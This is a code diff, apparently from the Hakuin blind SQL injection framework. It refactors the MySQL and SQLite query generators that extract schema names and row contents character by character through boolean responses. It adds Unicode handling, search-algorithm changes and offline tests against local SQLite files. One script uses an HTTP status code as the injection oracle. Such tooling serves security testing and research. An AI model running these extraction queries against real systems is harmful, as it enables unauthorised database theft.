SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class MySQLColumnsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length(COLUMN_NAME) != {len(ctx.s)} AND
locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class MySQLRowsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM {MySQL.escape(ctx.table)}
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
FROM {MySQL.escape(ctx.table)}
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND
locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx, values):
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
query = f'''
SELECT {MySQL.escape(ctx.column)} in ({','.join(values)})
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
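For reference, the hex string literals used throughout these queries can be reproduced with plain Python:

value = 'Ħ€ȽȽ©'
print(f"x'{value.encode('utf-8').hex()}'")  # x'c4a6e282ac...' works as a MySQL/SQLite literal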
class MySQL(DBMS):
DATA_TYPES = [
@@ -14,151 +303,15 @@ class MySQL(DBMS):
'multilinestring', 'multipolygon', 'geometrycollection ', 'json'
]
MetaQueries = MySQLMetaQueries()
TablesQueries = MySQLTablesQueries()
ColumnsQueries = MySQLColumnsQueries()
RowsQueries = MySQLRowsQueries()
def count_rows(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM {ctx.table}
'''
return self.normalize(query)
def count_tables(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
'''
return self.normalize(query)
def count_columns(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
'''
return self.normalize(query)
def meta_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT LOWER(DATA_TYPE) in ({','.join(values)})
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def meta_is_nullable(self, ctx):
query = f'''
SELECT IS_NULLABLE='YES'
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def meta_is_pk(self, ctx):
query = f'''
SELECT COLUMN_KEY='PRI'
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def char_rows(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
query = f'''
SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_tables(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_columns(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string_rows(self, ctx, values):
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
query = f'''
SELECT {ctx.column} in ({','.join(values)})
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
@staticmethod
def escape(s):
if DBMS._RE_ESCAPE.fullmatch(s):
return s
assert '`' not in s, f'Cannot escape "{s}"'
return f'`{s}`'

@@ -1,145 +1,290 @@
from hakuin.utils import EOS
from .DBMS import DBMS
from .DBMS import DBMS, MetaQueries, UniformQueries
class SQLite(DBMS):
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
def count_rows(self, ctx, n):
class SQLiteMetaQueries(MetaQueries):
def column_data_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT COUNT(*) < {n}
FROM {ctx.table}
SELECT type in ({','.join(values)})
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def count_tables(self, ctx, n):
def column_is_nullable(self, ctx):
query = f'''
SELECT COUNT(*) < {n}
SELECT [notnull] == 0
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_pk(self, ctx):
query = f'''
SELECT pk
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
class SQLiteTablesQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM sqlite_master
WHERE type='table'
'''
return self.normalize(query)
def count_columns(self, ctx, n):
def rows_are_ascii(self, ctx):
# SQLite has no native "isascii" function. As a workaround we look for
# non-ASCII characters with the "*[^\x01-\x7f]*" glob pattern. The pattern does not need to
# include the null terminator (0x00) because SQLite will never pass it to the GLOB expression.
# Also, the pattern is hex-encoded because SQLite does not support special characters in
# string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty
# string resolves to True, which is correct.
query = f'''
SELECT COUNT(*) < {n}
FROM pragma_table_info('{ctx.table}')
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM sqlite_master
WHERE type='table'
'''
return self.normalize(query)
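A one-line sanity check (plain Python) that the hex literal decodes to the intended glob pattern:

assert bytes.fromhex('2a5b5e012d7f5d2a').decode() == '*[^\x01-\x7f]*'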
def meta_type(self, ctx, values):
values = [f"'{v}'" for v in values]
def row_is_ascii(self, ctx):
query = f'''
SELECT type in ({','.join(values)})
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def meta_is_nullable(self, ctx):
query = f'''
SELECT [notnull] == 0
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def meta_is_pk(self, ctx):
query = f'''
SELECT pk
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def char_rows(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
query = f'''
SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_tables(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_columns(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info('{ctx.table}')
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info('{ctx.table}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string_rows(self, ctx, values):
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
query = f'''
SELECT cast({ctx.column} as BLOB) in ({','.join(values)})
FROM {ctx.table}
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length(name) != {len(ctx.s)} AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class SQLiteColumnsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM pragma_table_info(x'{self.hex(ctx.table)}')
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length(name) != {len(ctx.s)} AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class SQLiteRowsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM {SQLite.escape(ctx.table)}
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT sum({SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM {SQLite.escape(ctx.table)}
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT {SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length({SQLite.escape(ctx.column)}) != {len(ctx.s)} AND
instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) < {n}
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx, values):
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
query = f'''
SELECT cast({SQLite.escape(ctx.column)} as BLOB) in ({','.join(values)})
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
class SQLite(DBMS):
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
MetaQueries = SQLiteMetaQueries()
TablesQueries = SQLiteTablesQueries()
ColumnsQueries = SQLiteColumnsQueries()
RowsQueries = SQLiteRowsQueries()

@@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta):
class IntExponentialSearch(SearchAlgorithm):
'''Exponential search for integers.'''
def __init__(self, requester, query_cb, upper=16, correct=None):
class IntExponentialBinarySearch(SearchAlgorithm):
'''Exponential and binary search for integers.'''
def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
'''Constructor.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
upper (int): initial upper bound of search range
lower (int): lower bound of search range
upper (int): upper bound of search range
find_range (bool): if True, exponentially expands the range until it contains the correct value
correct (int|None): correct value. If provided, the search is emulated
'''
super().__init__(requester, query_cb)
self.lower = lower
self.upper = upper
self.find_range = find_range
self.correct = correct
self.n_queries = 0
@@ -63,22 +67,26 @@ class IntExponentialSearch(SearchAlgorithm):
'''Runs the search algorithm.
Params:
ctx (Context): inference context
ctx (Context): extraction context
Returns:
int: inferred number
'''
self.n_queries = 0
lower, upper = self._get_range(ctx, lower=0, upper=self.upper)
if self.find_range:
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
else:
lower, upper = self.lower, self.upper
return self._search(ctx, lower, upper)
def _get_range(self, ctx, lower, upper):
def _find_range(self, ctx, lower, upper):
'''Exponentially expands the search range until the correct value is within it.
Params:
ctx (Context): inference context
ctx (Context): extraction context
lower (int): lower bound
upper (int): upper bound
@@ -88,14 +96,14 @@ class IntExponentialSearch(SearchAlgorithm):
if self._query(ctx, upper):
return lower, upper
return self._get_range(ctx, upper, upper * 2)
return self._find_range(ctx, upper, upper * 2)
def _search(self, ctx, lower, upper):
'''Numeric binary search.
Params:
ctx (Context): inference context
ctx (Context): extraction context
lower (int): lower bound
upper (int): upper bound
@@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm):
middle = (lower + upper) // 2
if self._query(ctx, middle):
return self._search(ctx, lower, middle)
else:
return self._search(ctx, middle, upper)
return self._search(ctx, middle, upper)
def _query(self, ctx, n):
@@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm):
if self.correct is None:
query_string = self.query_cb(ctx, n)
return self.requester.request(ctx, query_string)
else:
return self.correct < n
return self.correct < n
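A minimal emulated run (a sketch: with correct set, _query never touches the requester, so requester and query_cb can be None and n_queries counts the emulated probes):

from hakuin.search_algorithms import Context, IntExponentialBinarySearch

alg = IntExponentialBinarySearch(
    requester=None,
    query_cb=None,
    upper=8,
    find_range=True,
    correct=37,
)
print(alg.run(Context(None, None, None, None)), alg.n_queries)  # expected: 37 and the probe count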
@@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm):
'''Runs the search algorithm.
Params:
ctx (Context): inference context
ctx (Context): extraction context
Returns:
value|None: inferred value or None on fail
'''
self.n_queries = 0
return self._search(ctx, self.values)
@@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm):
if self._query(ctx, left):
return self._search(ctx, left)
else:
return self._search(ctx, right)
return self._search(ctx, right)
def _query(self, ctx, values):
@@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm):
if self.correct is None:
query_string = self.query_cb(ctx, values)
return self.requester.request(ctx, query_string)
else:
return self.correct in values
return self.correct in values
@@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm):
'''Runs the search algorithm.
Params:
ctx (Context): inference context
ctx (Context): extraction context
Returns:
value|None: inferred value or None on fail
'''
self.n_queries = 0
return self._search(ctx, self.tree, in_tree=self.in_tree)
@@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm):
'''Tree search.
Params:
ctx (Context): inference context
ctx (Context): extraction context
tree (utils.huffman.Node): Huffman tree to search
in_tree (bool): True if the correct value is known to be in the tree
@@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm):
if self._query(ctx, tree.left.values()):
return self._search(ctx, tree.left, True)
else:
if tree.right is None:
return None
return self._search(ctx, tree.right, in_tree)
if tree.right is None:
return None
return self._search(ctx, tree.right, in_tree)
def _query(self, ctx, values):
@@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm):
if self.correct is None:
query_string = self.query_cb(ctx, values)
return self.requester.request(ctx, query_string)
else:
return self.correct in values
return self.correct in values

@@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')
ASCII_MAX = 0x7f
UNICODE_MAX = 0x10ffff
CHARSET_ASCII = [chr(x) for x in range(128)] + ['</s>']
CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + ['</s>']
EOS = '</s>'
SOS = '<s>'

@@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs'))
class OfflineRequester(Requester):
'''Offline requester for testing purposes.'''
def __init__(self, db):
def __init__(self, db, verbose=False):
'''Constructor.
Params:
db (str): name of an .sqlite DB in the "dbs" dir
verbose (bool): flag for verbose prints
'''
db_file = os.path.join(DIR_DBS, f'{db}.sqlite')
assert os.path.exists(db_file), f'DB not found: {db_file}'
self.db = sqlite3.connect(db_file).cursor()
self.verbose = verbose
self.n_queries = 0
def request(self, ctx, query):
self.n_queries += 1
query = f'SELECT cast(({query}) as bool)'
return bool(self.db.execute(query).fetchone()[0])
res = bool(self.db.execute(query).fetchone()[0])
if self.verbose:
print(f'"{ctx.s}"\t{res}\t{query}')
return res
def reset(self):

7
tests/dbs/unicode.json Normal file

@@ -0,0 +1,7 @@
{
"Ħ€ȽȽ© ŴǑȒȽƉ": [
{
"Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"
}
]
}

BIN
tests/dbs/unicode.sqlite Normal file

Binary file not shown.

@@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json')
def main():
assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [<table> <column>]'
requester = OfflineRequester(db='large_content')
requester = OfflineRequester(db='large_content', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
if len(sys.argv) == 3:
@@ -60,58 +60,58 @@ if __name__ == '__main__':
# {
# "users": {
# "username": [
# 42124,
# 5.738182808881624
# 42125,
# 5.738319030104891
# ],
# "first_name": [
# 27901,
# 4.882919145957298
# 27902,
# 4.883094154707735
# ],
# "last_name": [
# 32701,
# 5.344173884621671
# 32702,
# 5.344337310017977
# ],
# "sex": [
# 1608,
# 0.3216
# 1609,
# 0.3218
# ],
# "email": [
# 78138,
# 3.7532062058696383
# 78139,
# 3.7532542389163743
# ],
# "password": [
# 137115,
# 4.28484375
# 137116,
# 4.284875
# ],
# "address": [
# 86872,
# 2.1946795341434453
# 86873,
# 2.1947047975140843
# ]
# },
# "posts": {
# "text": [
# 409302,
# 4.312482220185226
# 409303,
# 4.312492756371759
# ]
# },
# "comments": {
# "text": [
# 346373,
# 3.920464063384267
# 346374,
# 3.9204753820033957
# ]
# },
# "products": {
# "name": [
# 491174,
# 3.8737341871983344
# 491175,
# 3.873742073882457
# ],
# "category": [
# 6721,
# 0.42975893599334997
# 6753,
# 0.4318051026280453
# ],
# "description": [
# 966309,
# 3.2259549579023976
# 966310,
# 3.2259582963324007
# ]
# }
# }

@@ -27,3 +27,8 @@ def main():
if __name__ == '__main__':
main()
# Expected results:
# Total requests: 27376
# Average RPC: 2.2098805295447206

@@ -25,13 +25,17 @@ class R(Requester):
r = requests.get(url)
assert r.status_code in [200, 404], f'Unexpected response code: {r.status_code}'
# print(ctx.s, r.status_code == 200, query)
return r.status_code == 200
def main():
assert len(sys.argv) == 4, 'python3 experiment_generic_db.py <dbms> <table> <column>'
_, dbms_type, table, column = sys.argv
assert len(sys.argv) >= 2, 'python3 experiment_generic_db.py <dbms> [<table> <column>]'
argv = sys.argv + [None, None]
_, dbms_type, table, column = argv[:4]
allowed = ['sqlite', 'mysql']
assert dbms_type in allowed, f'dbms must be in {allowed}'
@@ -39,10 +43,12 @@ def main():
dbms = SQLite() if dbms_type == 'sqlite' else MySQL()
ext = Extractor(requester, dbms)
res = ext.extract_schema(metadata=True)
print(json.dumps(res, indent=4))
res = ext.extract_column(table, column)
print(json.dumps(res, indent=4))
if table is None:
res = ext.extract_schema(strategy='model', metadata=True)
print(json.dumps(res, indent=4))
else:
res = ext.extract_column(table, column)
print(json.dumps(res, indent=4))

@@ -0,0 +1,29 @@
import json
import logging
from hakuin.dbms import SQLite
from hakuin import Extractor
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='large_content')
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(metadata=True)
print(json.dumps(res, indent=4))
res_len = sum([len(table) for table in res])
res_len += sum([len(column) for table, columns in res.items() for column in columns])
print('Total requests:', requester.n_queries)
print('Average RPC:', requester.n_queries / res_len)
if __name__ == '__main__':
main()

28
tests/test_unicode.py Normal file

@@ -0,0 +1,28 @@
import json
import logging
import hakuin
from hakuin import Extractor
from hakuin.dbms import SQLite
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='unicode', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(strategy='binary')
print(res)
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
if __name__ == '__main__':
main()